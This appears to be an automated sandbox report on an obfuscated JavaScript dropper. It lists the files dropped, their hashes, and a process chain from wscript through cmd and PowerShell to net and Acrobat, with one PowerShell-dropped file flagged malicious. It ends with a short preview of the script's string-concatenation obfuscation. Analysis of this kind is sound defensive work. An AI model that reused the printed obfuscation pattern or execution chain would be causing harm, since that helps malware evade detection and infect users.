C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.302666224626247 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJfbPtdPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGDV8Ukee9 |
MD5: | 6C2BCDF710CE1D37E927BB7B99098868 |
SHA1: | 982D473ED98211C2EB01FFC7750B256BC638EBE4 |
SHA-256: | 6E485249467DEC53D746AC95BE6109D135390D77ED198501D2A3784AC742FE7B |
SHA-512: | 72E3B33486769D999C8BAA06C1ED14C15B490E1EFDEAECA7C7B6C263906B3E86043C6AEA5350273AB0D89DB50E3F08ADDB632AD874B75F689BDE382A0BEB56BA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.294357251330201 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJf21rPeUkwRe9:YvXKXdeUBfILT5LjIPN42sG+16Ukee9 |
MD5: | 56D7FEB9847FF04A8D7675B5FF77BC5F |
SHA1: | 64BA93802040DF91A2BAFA38A0B6D8CB85B95A4E |
SHA-256: | 353A86D56E5F8BF5017F976513B5BAF5BB2F5245EB3130045A72D592B178F529 |
SHA-512: | 83C7ACE8BE385D063B06EDBDAB747F8BABA5B65F4FF0C4E6F4AA00044A0A73C3B53218A57691EEB638D5E2FB3133BFF7D43EAA1309A91AB14AA0906219A35F28 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.672141590581496 |
Encrypted: | false |
SSDEEP: | 24:Yv6Xd1gLT5XIl425amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSr:YvG1gBXeFBgkDMUJUAh8cvMr |
MD5: | 1165FB3B1E2BD13026C315CE20733BD2 |
SHA1: | E086B8741985784E62BC94A9D5C50715C0E4FFD6 |
SHA-256: | 03B39374616824253FC434566409996D5A162464F483ADC44B8C8E1BAECD8EE1 |
SHA-512: | 1F3ACC253912F30F0DA75C2720F6A7D98238A43264F833997518F2A09BFD92316177EC137F7993343C7009759DFC542B19906CA9094EF48CE24979BF6D1C161E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.269092160269033 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJfshHHrPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGUUUkee9 |
MD5: | 582BA7D77B11FCA440B1B559782180A2 |
SHA1: | 5897DC9D84AFABE3A740AA49E1EA73B347749A0A |
SHA-256: | 8F0F9CF5F4AFE5D3419B9E012A027FE7B2563B34C9F38AD649272F8F237FDF04 |
SHA-512: | D7658CA3AF85F57B7475BD117BB7007ACE08CE67C8A684518C6C0B989D05E06BBFB1F806311A6739D79A05FE337C6A4CB00C4F5B87381AEF2377DD77B6056590 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.2783575332765755 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJTqgFCrPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGTq16Ukee9 |
MD5: | C2C5D14F52538A515105B85D110E6E84 |
SHA1: | A9F95523CC7A3F2A0F81355195E1DB64F5C1BFA2 |
SHA-256: | 65D30605CD4B547D8A81204E0A3F94F4019340D568D168BDCDB20BA464736144 |
SHA-512: | 5E11C0B953DEB2A72937C2F51292E51E387035E0BCA1621D7A9CFB9067BA8A621CF896BED2EEA3B7CA9B15B7025135C8C3D39D59F1F5A38962B3C411AD388627 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.143505851957113 |
Encrypted: | false |
SSDEEP: | 24:YnJaAA3ayFvZ2hrmI3A0xb6lmbYzjQBBsj0SJtB2LQH2LSLCcuqqdKk6xa5C+GhP:YBAgrm+d6XQ3+BPRLuqqv68Rwh9Qo |
MD5: | 8D51284FD82EAB333EDDA621070D02E7 |
SHA1: | 19FC03828EA142D98495AF5DBE5EFA81DD018023 |
SHA-256: | 800253D369919E48C40B566EA173756A65A50E8F5AB890C4178F3B4D58D585AF |
SHA-512: | 7D6B91A4480BDA1267B6C3D4DC1DFE0880AAE7319AF97C5A261595F318CA30D15CB1D2EAFC2B292994128B9A394669F29EC267A021BF021559B3A35120C95AA6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.367798132996347 |
Encrypted: | false |
SSDEEP: | 24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDuDdNCXKdqEKfS8EKfM1ba7dNCF:Tll2GL7msMcKTlS8fcsulfIm |
MD5: | 90D880EFE56BC6A337EFB0DEDFC1C819 |
SHA1: | 894ADFD4DEA3B62CF9B7511D6B988D817CCB6556 |
SHA-256: | 3420FE587F5C589E7ED800E2A63BAC8A5CF98C8F7F67DCF8D1A0BF56538E24CA |
SHA-512: | 48C0DD5EA1B9DC1353FE7231D044C4388EC722DC61E0CA8698115D96A072D45D64BF725D354C80D6BB053615CFF80A7864BEE3237400E30EB0310C36B3BCAB8E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.84541696844772 |
Encrypted: | false |
SSDEEP: | 24:7+ttWZ6bqyKn6ylSTofcNqDuDdNC+KdqEKfS8EKfM1banbqGqLKufx/XYKQvGJFL:7MucKTlS8fcsu8fITqGufl2GL7msb |
MD5: | D8682474A318CB7A9BA98DB7A12BADB2 |
SHA1: | 8325FD20E14A101D9CB8BCA178A5088DA75668D5 |
SHA-256: | A3FC7D2E754BFFBE6FB0801AC8FA5B8C71A8A47BB322B409ACD247105CE592AF |
SHA-512: | 5C879D4728540C1E9448671783ADD8E67EB01D7D0184F4E84FBEE34086AECC426A3CC066C9BABD8C96A70D3F560A2B0233E102B70C1049B2708D56B42AEB3BEF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgsP3upH2l3ugh09tGxM51oyG2Yyu:6a6TZ44ADEsP+pHweghiof2K |
MD5: | 5816E56C2EEFC204780A142F44519D40 |
SHA1: | F12DE4F845F2F405227B955E66AA6A4C380320C7 |
SHA-256: | 8EADFEAE8799CCD4EBC46FFF81C0833A6F257F177C2E7B6891D1C1D1F919D78F |
SHA-512: | F61E0F4CB60111D3D2BD1D2366D444D4CA815B7D3FB37D76A4BB0D4B14DCDC9B0E9524FA726DB695B679867179F8881D3013A507BB5667104F5C96667F02EA01 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulDm0ll//Z:NllU6cl/ |
MD5: | DA1F22117B9766A1F0220503765A5BA5 |
SHA1: | D35597157EFE03AA1A88C1834DF8040B3DD3F3CB |
SHA-256: | BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69 |
SHA-512: | 520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4953527754662135 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClXlI:Qw946cPbiOxDlbYnuRK+bgG |
MD5: | 21EF5FC593D67A4DF871DAFF732FB2F9 |
SHA1: | 28AFE35E098B0794E7BF7A74EE3C1636E4928AC8 |
SHA-256: | AF68B67426F975DD48149496694FCCB9BABFA07E449E3C31F3D364583C0136A3 |
SHA-512: | 01873A28D8507C3A84263F99AE47B173E24CE2C909C9F69E04132B37495720CFCE6567B665B856C0C62A1F3B4E73406CB873F2DCFCB9006B05A44FDF0A80D1E6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 20-18-12-533.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.330589339471305 |
Encrypted: | false |
SSDEEP: | 384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink |
MD5: | 5BC0A308794F062FEC40F3016568DF9F |
SHA1: | 14149448191AB45E99011CBBEF39F2A9A03A0D15 |
SHA-256: | 00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473 |
SHA-512: | CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15111 |
Entropy (8bit): | 5.354298919697578 |
Encrypted: | false |
SSDEEP: | 384:fk2degX7o/9vljOSJOB2aINwc7O/lRFR1ee4Suonj5LLKC1HR0r0R8CkY93m65h2:3wD |
MD5: | 344F8E836F7E8143F163558F29FC0643 |
SHA1: | B390183AE9F2211560C70C784700E5D0CB3BAA1D |
SHA-256: | F611FF7F0DDBD95BDC9031816C4ECB5D6E878B5E9998645715F379C26B0E5A3B |
SHA-512: | 1C09BD2EA7C69A3E960B13AB2544A4147AEE18E84884783E591FDC218D16A6E58254C2693BF1153CB1262FC6F524D782FD9C523AD3611786E548081F748004A4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.3778844917548385 |
Encrypted: | false |
SSDEEP: | 192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbmaGcbMINNcbR:8qnXopZ50rWVNy |
MD5: | F36B95FEAC621E0F593BEA39C58321F2 |
SHA1: | 3296DDA17E62914CC6137948DA32E0794B99B3F7 |
SHA-256: | C31A732B2E0B19605F9FEED50C54312B5DAD9C9C33ACBAEFDB3249C2F6F532C9 |
SHA-512: | 4A7FD6EC632DB8E37711E8FE1B572819B9B2DAD9BAE2E38163D92E3E171C09DAEDDC92AFDFB00016920DA4CE334009C8F7293BD9F6C5B87372DFB6DFC64039C6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/M7ouWLYZwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RuWLYZwZGuGZn3mlind9i4ufFXpAXkru |
MD5: | EC8D4FAB55F24C0E344D263724846C4A |
SHA1: | 5444D90F86D68A23AF7FB5434DEAE740D57D0312 |
SHA-256: | E489C11D38BFF8F1F51351BAEBEE9F723A5C036DA0B0CB9C82306251017054EE |
SHA-512: | 21018FD299944987654C202779C8E0185815868DE7179B814F145573EE8D45ACC33CA7E008CB23774C473DD7939E9D7D7C2E5A14E31D5EC62F7BFFDBBAB41F9A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/yKwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:bwZG2b3mlind9i4ufFXpAXkrfUs0qWLk |
MD5: | D1BC27E013E1129B27D3BE5F4567D495 |
SHA1: | D2D1B846698798C80E57917477F7B98054B48925 |
SHA-256: | 3EF526805CA6690C3E477DFD81BFD4B28B8D82CCA8E3641C3EDA0EC37F332DDC |
SHA-512: | EBCEFA11F5BC59D602D90177B460B0F0DA59534D347FFBAF1A7C78118A3A221A02284E0A34164F6C0710C1B4E88504C4A20DA69AC998B5EE613A017B208316CB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.918271244304947 |
TrID: | |
File name: | 17985298091058916725.js |
File size: | 19'702 bytes |
MD5: | ad936c99708945662a28663ead1a5537 |
SHA1: | 704d429e03374dac6c6e164450c5b2579563e2a4 |
SHA256: | c840b33bff8a66679eb60f2676d0d8d7f7bb01fadff7d67533cfae42899c5b3f |
SHA512: | e4ed4767c95288eb955ab674656449add69e287550b9905cbfdd55e1326e46ce8e5839b496309d0bbb65456f429c7d6908b507eeb59f1b0a800679d69c7a7f26 |
SSDEEP: | 384:G2vDV2sDUDMDUHHE8BqYjfjvacvzpkFeY2O3rc6:G2vDV2sDUDMDUHko5jfj5rpDO3rp |
TLSH: | B39298C28E80CF1A58F93665ED97051AC0784325C91EA6F93A282D5D4F989C8F5D33BF |
File Content Preview: | function aovaisrph(){ddafughql=[1031,3079,5127,4103,2055,3072];var jbcdtqr=this[kcrxlv+hkwjlj+wearigqh+tejovdeev+ybqvbyfl+vtyiy+abblikex+bcggh](this[qabokj+vgvbso+panrutt+wearigqh+liuzxmkoj+kcrxlv+bcggh][ylnbm+wearigqh+ybqvbyfl+hkwjlj+bcggh+ybqvbyfl+fiiwo |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 20:18:01 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff669220000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 20:18:02 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff648900000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 20:18:02 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 20:18:02 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff760310000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 20:18:07 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6153b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 20:18:07 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff648900000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 20:18:07 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a8290000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 20:18:08 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61f300000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 20:18:08 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff77afe0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 20:18:09 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61f300000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function aovaisrph() { |
|
1 | ddafughql = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
